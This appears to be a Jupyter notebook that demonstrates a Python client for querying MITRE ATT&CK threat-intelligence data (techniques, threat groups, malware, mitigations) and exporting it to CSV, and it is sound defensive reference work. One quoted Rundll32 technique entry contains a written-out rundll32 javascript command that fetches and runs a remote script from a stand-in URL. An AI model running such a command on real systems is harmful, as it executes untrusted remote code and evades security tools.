{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# **MITRE ATT&CK API FILTERS**: Python Client\n", "------------------" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Import ATTACK API Client" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [], "source": [ "from attackcti import attack_client" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Import Extra Libraries" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [], "source": [ "from pandas import *\n", "from pandas.io.json import json_normalize" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Initialize ATT&CK Client Variable" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [], "source": [ "lift = attack_client()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Technique by Name (TAXII)\n", "You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive." ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [], "source": [ "technique_name = lift.get_technique_by_name('Rundll32')" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'type': 'attack-pattern',\n", " 'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5',\n", " 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n", " 'created': '2017-05-31 21:31:06.045000+00:00',\n", " 'modified': '2018-04-18 17:59:24.739000+00:00',\n", " 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n", " 'url': 'https://attack.mitre.org/wiki/Technique/T1085',\n", " 'matrix': 'mitre-attack',\n", " 'technique': 'Rundll32',\n", " 'technique_description': 'The rundll32.exe program can be called to execute an arbitrary binary. 
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\\n\\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\\\..\\\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\\n\\nDetection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. 
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.\\n\\nPlatforms: Windows\\n\\nData Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring\\n\\nDefense Bypassed: Anti-virus, Application whitelisting\\n\\nPermissions Required: User\\n\\nRemote Support: No\\n\\nContributors: Ricardo Dias, Casey Smith',\n", " 'tactic': ['defense-evasion', 'execution'],\n", " 'technique_id': 'T1085',\n", " 'platform': ['Windows'],\n", " 'data_sources': ['File monitoring',\n", " 'Binary file metadata',\n", " 'Process command-line parameters',\n", " 'Process monitoring'],\n", " 'defense_bypassed': ['Anti-virus', 'Application whitelisting'],\n", " 'permissions_required': ['User'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': False,\n", " 'contributors': ['Ricardo Dias', 'Casey Smith'],\n", " 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1085',\n", " 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf',\n", " 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 5, "metadata": {}, "output_type": "execute_result" } ], "source": [ "technique_name" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Data Sources from All Techniques (TAXII)\n", "* You can also get all the data sources available in ATT&CK\n", "* Currently the only techniques with data sources are the ones in Enterprise ATT&CK." 
] }, { "cell_type": "code", "execution_count": 6, "metadata": {}, "outputs": [], "source": [ "data_sources = lift.get_all_data_sources()" ] }, { "cell_type": "code", "execution_count": 7, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "48" ] }, "execution_count": 7, "metadata": {}, "output_type": "execute_result" } ], "source": [ "len(data_sources)" ] }, { "cell_type": "code", "execution_count": 8, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['browser extensions',\n", " 'web application firewall logs',\n", " 'named pipes',\n", " 'dns records',\n", " 'mbr',\n", " 'detonation chamber',\n", " 'windows error reporting',\n", " 'powershell logs',\n", " 'asset management',\n", " 'web logs',\n", " 'ssl/tls inspection',\n", " 'access tokens',\n", " 'application logs',\n", " 'data loss prevention',\n", " 'windows registry',\n", " 'network device logs',\n", " 'binary file metadata',\n", " 'anti-virus',\n", " 'vbr',\n", " 'file monitoring',\n", " 'services',\n", " 'web proxy',\n", " 'digital certificate logs',\n", " 'bios',\n", " 'malware reverse engineering',\n", " 'user interface',\n", " 'system calls',\n", " 'host network interface',\n", " 'efi',\n", " 'windows event logs',\n", " 'api monitoring',\n", " 'network intrusion detection system',\n", " 'dll monitoring',\n", " 'environment variable',\n", " 'packet capture',\n", " 'mail server',\n", " 'wmi objects',\n", " 'netflow/enclave netflow',\n", " 'sensor health and status',\n", " 'process monitoring',\n", " 'network protocol analysis',\n", " 'kernel drivers',\n", " 'process use of network',\n", " 'loaded dlls',\n", " 'third-party application logs',\n", " 'authentication logs',\n", " 'email gateway',\n", " 'process command-line parameters']" ] }, "execution_count": 8, "metadata": {}, "output_type": "execute_result" } ], "source": [ "data_sources" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Any STIX Object by ID (TAXII)\n", "* You can get any STIX object by its id across all the 
matrices. It is case sensitive.\n", "* You can use the following STIX Object Types:\n", " * attack-pattern > techniques\n", " * course-of-action > mitigations\n", " * intrusion-set > groups\n", " * malware\n", " * tool" ] }, { "cell_type": "code", "execution_count": 9, "metadata": {}, "outputs": [], "source": [ "object_by_id = lift.get_object_by_attack_id('attack-pattern', 'PRE-T1054')" ] }, { "cell_type": "code", "execution_count": 10, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'type': 'attack-pattern',\n", " 'id': 'attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88',\n", " 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n", " 'created': '2017-12-14 16:46:06.044000+00:00',\n", " 'modified': '2018-04-18 17:59:24.739000+00:00',\n", " 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n", " 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054',\n", " 'matrix': 'mitre-pre-attack',\n", " 'technique': 'Acquire OSINT data sets and information',\n", " 'technique_description': 'Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)\\n\\nDetectable by Common Defenses: No\\n\\nDetectable by Common Defenses explanation: This activity is indistinguishable from legitimate business uses and easy to obtain.\\n\\nDifficulty for the Adversary: Yes\\n\\nDifficulty for the Adversary explanation: Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). 
Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.',\n", " 'tactic': ['organizational-information-gathering'],\n", " 'technique_id': 'PRE-T1054',\n", " 'platform': None,\n", " 'data_sources': None,\n", " 'defense_bypassed': None,\n", " 'permissions_required': None,\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': None,\n", " 'technique_references': ['https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054',\n", " 'SANSThreatProfile',\n", " 'Infosec-osint',\n", " 'isight-osint'],\n", " 'detectable_by_common_defenses': 'No',\n", " 'detectable_explanation': 'This activity is indistinguishable from legitimate business uses and easy to obtain.',\n", " 'difficulty_for_adversary': 'Yes',\n", " 'difficulty_explanation': 'Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.',\n", " 'tactic_type': None}" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "object_by_id" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Any Group by Alias (TAXII)\n", "You can get any Group by its Alias property across all the matrices. It is case sensitive." 
] }, { "cell_type": "code", "execution_count": 11, "metadata": {}, "outputs": [], "source": [ "group_name = lift.get_group_by_alias('Cozy Bear')" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'type': 'intrusion-set',\n", " 'id': 'intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542',\n", " 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n", " 'matrix': 'mitre-attack',\n", " 'created': '2017-05-31 21:31:52.748000+00:00',\n", " 'modified': '2018-04-18 17:59:24.739000+00:00',\n", " 'url': 'https://attack.mitre.org/wiki/Group/G0016',\n", " 'group': 'APT29',\n", " 'group_description': 'APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)',\n", " 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'],\n", " 'group_id': 'G0016',\n", " 'group_references': ['https://attack.mitre.org/wiki/Group/G0016',\n", " 'https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf',\n", " 'GRIZZLY STEPPE JAR',\n", " 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/']}" ] }, "execution_count": 12, "metadata": {}, "output_type": "execute_result" } ], "source": [ "group_name" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Relationships by Any Object (TAXII)\n", "* You can get specific relationships defined in ATT&CK for specific objects across all the matrices.\n", "* The valid options are: **groups**, **software** and **mitigations**\n", "* This function collects all the relationships available in ATT&CK via the **get_all_relationships()** function. 
Then, depending on the specific stix object requested, the information is filtered.\n", "* The function enriches the output of the **get_all_relationships()** one by adding more context to the **source object** defined in the **Relationships stix object**.\n", "* You get more information about the source and also keep the **target source** object id to then map the results to the target stix object." ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'target_object': 'attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e',\n", " 'relationship_description': 'Cobalt Strike uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.',\n", " 'software_type': 'tool',\n", " 'matrix': 'mitre-attack',\n", " 'software': 'Cobalt Strike',\n", " 'software_description': 'Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)\\n\\nIn addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. 
(Citation: cobaltstrike manual)\\n\\nAliases: Cobalt Strike\\n\\nContributors: Josh Abraham',\n", " 'software_labels': ['tool'],\n", " 'software_id': 'S0154',\n", " 'url': 'https://attack.mitre.org/wiki/Software/S0154',\n", " 'software_aliases': ['Cobalt Strike'],\n", " 'software_references': ['https://attack.mitre.org/wiki/Software/S0154',\n", " 'https://cobaltstrike.com/downloads/csmanual38.pdf']}" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "relationships = lift.get_relationships_by_object('software')\n", "relationships[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get All Techniques with Mitigations (TAXII)\n", "The difference between this function and **get_all_techniques()** is that **get_all_techniques_with_mitigations** returns (of course haha) mitigations mapped to their respective techniques. This is useful when you want to gather mitigations and techniques all at once." ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [], "source": [ "complete_techniques = lift.get_all_techniques_with_mitigations()" ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'mitigation': '.bash_profile and .bashrc Mitigation',\n", " 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.',\n", " 'mitigation_id': 'T1156',\n", " 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'],\n", " 'technique': '.bash_profile and .bashrc',\n", " 'technique_description': \"~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. 
This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed.\\n\\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\\n\\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\\n\\nDetection: While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\\n\\nPlatforms: Linux, macOS\\n\\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\\n\\nPermissions Required: User, Administrator\",\n", " 'tactic': ['persistence'],\n", " 'url': 'https://attack.mitre.org/wiki/Technique/T1156',\n", " 'technique_id': 'T1156',\n", " 'platform': ['Linux', 'macOS'],\n", " 'data_sources': ['File monitoring',\n", " 'Process Monitoring',\n", " 'Process command-line parameters',\n", " 'Process use of network'],\n", " 'defense_bypassed': None,\n", " 'permissions_required': ['User', 'Administrator'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': None,\n", " 'technique_references': 
['https://attack.mitre.org/wiki/Technique/T1156',\n", " 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 15, "metadata": {}, "output_type": "execute_result" } ], "source": [ "complete_techniques[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Techniques Used by Software (TAXII)\n", "If you do not provide the name of a specific **Software** (Case Sensitive), the function returns information about every piece of software across all the matrices." ] }, { "cell_type": "code", "execution_count": 16, "metadata": {}, "outputs": [], "source": [ "software_techniques = lift.get_techniques_used_by_software('BITSAdmin')" ] }, { "cell_type": "code", "execution_count": 17, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_description': 'can be used to create BITS Jobs to upload and/or download files.',\n", " 'software': 'BITSAdmin',\n", " 'software_description': 'is a command line tool used to create and manage BITS Jobs. (Citation: Microsoft BITSAdmin)\\n\\nAliases: BITSAdmin',\n", " 'software_labels': ['tool'],\n", " 'software_id': 'S0190',\n", " 'software_aliases': ['BITSAdmin'],\n", " 'software_references': ['https://attack.mitre.org/wiki/Software/S0190',\n", " 'https://msdn.microsoft.com/library/aa362813.aspx'],\n", " 'technique': 'Remote File Copy',\n", " 'technique_description': 'Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. 
Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\\n\\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.\\n\\nDetection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\\n\\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\\n\\nPlatforms: Linux, macOS, Windows\\n\\nData Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring\\n\\nPermissions Required: User\\n\\nRequires Network: Yes',\n", " 'tactic': ['command-and-control', 'lateral-movement'],\n", " 'technique_id': 'T1105',\n", " 'url': 'https://attack.mitre.org/wiki/Technique/T1105'}" ] }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "source": [ "software_techniques[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Techniques Used by Group (TAXII)\n", "If you do not provide the name of a specific **Group** (Case Sensitive), the function returns information about all the groups available across all the matrices." 
] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [], "source": [ "group_techniques = lift.get_techniques_used_by_group('APT12')" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-pre-attack',\n", " 'relationship_description': None,\n", " 'group': 'APT12',\n", " 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n", " 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n", " 'group_id': 'G0005',\n", " 'group_references': ['https://attack.mitre.org/wiki/Group/G0005',\n", " 'http://www.crowdstrike.com/blog/whois-numbered-panda/'],\n", " 'technique': 'Determine strategic target',\n", " 'technique_description': 'An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 (R)) (Citation: DoD Cyber 2015)\\n\\nDetectable by Common Defenses: No\\n\\nDetectable by Common Defenses explanation: Normally, defender is unable to detect. 
May change for special use cases or adversary and defender overlays.\\n\\nDifficulty for the Adversary: Yes\\n\\nDifficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.',\n", " 'tactic': ['target-selection'],\n", " 'technique_id': 'PRE-T1018',\n", " 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1018'}" ] }, "execution_count": 19, "metadata": {}, "output_type": "execute_result" } ], "source": [ "group_techniques[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Software Used by Group (TAXII)\n", "If you do not provide the name of a specific Group, it returns information about all the groups available across all the matrices." ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [], "source": [ "group_software = lift.get_software_used_by_group('APT12')" ] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_description': None,\n", " 'group': 'APT12',\n", " 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n", " 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n", " 'group_id': 'G0005',\n", " 'group_references': ['https://attack.mitre.org/wiki/Group/G0005',\n", " 'http://www.crowdstrike.com/blog/whois-numbered-panda/'],\n", " 'software url': 'https://attack.mitre.org/wiki/Software/S0015',\n", " 'software': 'Ixeshe',\n", " 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. 
(Citation: Moran 2013)\\n\\nAliases: Ixeshe',\n", " 'software_labels': ['malware'],\n", " 'software_id': 'S0015',\n", " 'software_aliases': ['Ixeshe'],\n", " 'software_references': ['https://attack.mitre.org/wiki/Software/S0015',\n", " 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n", " 'technique': 'Data Obfuscation',\n", " 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\\n\\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)\\n\\nPlatforms: Linux, macOS, Windows\\n\\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\\n\\nRequires Network: Yes',\n", " 'tactic': ['command-and-control'],\n", " 'technique_id': 'T1001'}" ] }, "execution_count": 21, "metadata": {}, "output_type": "execute_result" } ], "source": [ "group_software[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get Everything Used by Group (TAXII)\n", "* This function does not provide the techniques defined for each piece of Software that was used by the group.\n", "* The information returned covers techniques that were used by a group and the name and description of software.\n", "* If you do not provide the name of a specific **Group**, it returns information about all the groups available across all the matrices." ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [], "source": [ "all_used_by_group = lift.get_all_used_by_group('APT12')" ] }, { "cell_type": "code", "execution_count": 23, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'relationship_description': None,\n", " 'group': 'APT12',\n", " 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n", " 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n", " 'group_id': 'G0005',\n", " 'group_references': ['https://attack.mitre.org/wiki/Group/G0005',\n", " 'http://www.crowdstrike.com/blog/whois-numbered-panda/'],\n", " 'software url': 'https://attack.mitre.org/wiki/Software/S0015',\n", " 'software': 'Ixeshe',\n", " 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. 
(Citation: Moran 2013)\\n\\nAliases: Ixeshe',\n", " 'software_labels': ['malware'],\n", " 'software_id': 'S0015',\n", " 'software_aliases': ['Ixeshe'],\n", " 'software_references': ['https://attack.mitre.org/wiki/Software/S0015',\n", " 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n", " 'technique': 'Data Obfuscation',\n", " 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\\n\\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)\\n\\nPlatforms: Linux, macOS, Windows\\n\\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\\n\\nRequires Network: Yes',\n", " 'tactic': ['command-and-control'],\n", " 'technique_id': 'T1001'}" ] }, "execution_count": 23, "metadata": {}, "output_type": "execute_result" } ], "source": [ "all_used_by_group[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Get All ATT&CK (TAXII)\n", "* This function collects everything from the ATT&CK framework and presents it as a long list of dictionaries, which makes it easy to display the results as a table, unlike the **get_all_stix_objects()** function, which returns a dictionary.\n", "* It collects all the information from the following functions:\n", " * **get_all_techniques_with_mitigations()**\n", " * **get_all_software()**\n", " * **get_techniques_used_by_software()**\n", " * **get_all_groups()**\n", " * **get_all_used_by_group()**" ] }, { "cell_type": "code", "execution_count": 24, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "CPU times: user 13.9 s, sys: 280 ms, total: 14.2 s\n", "Wall time: 41.3 s\n" ] } ], "source": [ "%time all_attack_framework = lift.get_all_attack()" ] }, { "cell_type": "code", "execution_count": 25, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "list" ] }, "execution_count": 25, "metadata": {}, "output_type": "execute_result" } ], "source": [ "type(all_attack_framework)" ] }, { "cell_type": "code", "execution_count": 26, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "{'matrix': 'mitre-attack',\n", " 'mitigation': '.bash_profile and .bashrc Mitigation',\n", " 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.',\n", " 'mitigation_id': 'T1156',\n", " 'mitigation_references': 
['https://attack.mitre.org/wiki/Technique/T1156'],\n", " 'technique': '.bash_profile and .bashrc',\n", " 'technique_description': \"~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed.\\n\\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\\n\\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\\n\\nDetection: While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. 
Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\\n\\nPlatforms: Linux, macOS\\n\\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\\n\\nPermissions Required: User, Administrator\",\n", " 'tactic': ['persistence'],\n", " 'url': 'https://attack.mitre.org/wiki/Technique/T1156',\n", " 'technique_id': 'T1156',\n", " 'platform': ['Linux', 'macOS'],\n", " 'data_sources': ['File monitoring',\n", " 'Process Monitoring',\n", " 'Process command-line parameters',\n", " 'Process use of network'],\n", " 'defense_bypassed': None,\n", " 'permissions_required': ['User', 'Administrator'],\n", " 'effective_permissions': None,\n", " 'system_requirements': None,\n", " 'network_requirements': None,\n", " 'remote_support': None,\n", " 'contributors': None,\n", " 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156',\n", " 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'],\n", " 'detectable_by_common_defenses': None,\n", " 'detectable_explanation': None,\n", " 'difficulty_for_adversary': None,\n", " 'difficulty_explanation': None,\n", " 'tactic_type': None}" ] }, "execution_count": 26, "metadata": {}, "output_type": "execute_result" } ], "source": [ "all_attack_framework[0]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Showing schema of the results" ] }, { "cell_type": "code", "execution_count": 27, "metadata": {}, "outputs": [], "source": [ "df = json_normalize(all_attack_framework)" ] }, { "cell_type": "code", "execution_count": 28, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['contributors',\n", " 'data_sources',\n", " 'defense_bypassed',\n", " 'detectable_by_common_defenses',\n", " 'detectable_explanation',\n", " 'difficulty_explanation',\n", " 'difficulty_for_adversary',\n", " 
'effective_permissions',\n", " 'group',\n", " 'group_aliases',\n", " 'group_description',\n", " 'group_id',\n", " 'group_references',\n", " 'matrix',\n", " 'mitigation',\n", " 'mitigation_description',\n", " 'mitigation_id',\n", " 'mitigation_references',\n", " 'network_requirements',\n", " 'permissions_required',\n", " 'platform',\n", " 'relationship_description',\n", " 'remote_support',\n", " 'software',\n", " 'software url',\n", " 'software_aliases',\n", " 'software_description',\n", " 'software_id',\n", " 'software_labels',\n", " 'software_references',\n", " 'system_requirements',\n", " 'tactic',\n", " 'tactic_type',\n", " 'technique',\n", " 'technique_description',\n", " 'technique_id',\n", " 'technique_references',\n", " 'url']" ] }, "execution_count": 28, "metadata": {}, "output_type": "execute_result" } ], "source": [ "list(df)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### We can then export All ATT&CK as a CSV file" ] }, { "cell_type": "code", "execution_count": 29, "metadata": {}, "outputs": [], "source": [ "df = df[[\n", " 'matrix','tactic','technique','technique_id','technique_description',\n", " 'mitigation','mitigation_description','group','group_id','group_aliases',\n", " 'group_description','software','software_id','software_description','software_labels',\n", " 'relationship_description','platform','data_sources','detectable_by_common_defenses','detectable_explanation',\n", " 'difficulty_for_adversary','difficulty_explanation','effective_permissions','network_requirements','permissions_required',\n", " 'remote_support','system_requirements','contributors','url']]" ] }, { "cell_type": "code", "execution_count": 30, "metadata": {}, "outputs": [], "source": [ "df.to_csv('all_attack.csv',index=False,encoding='utf-8')" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] } ], 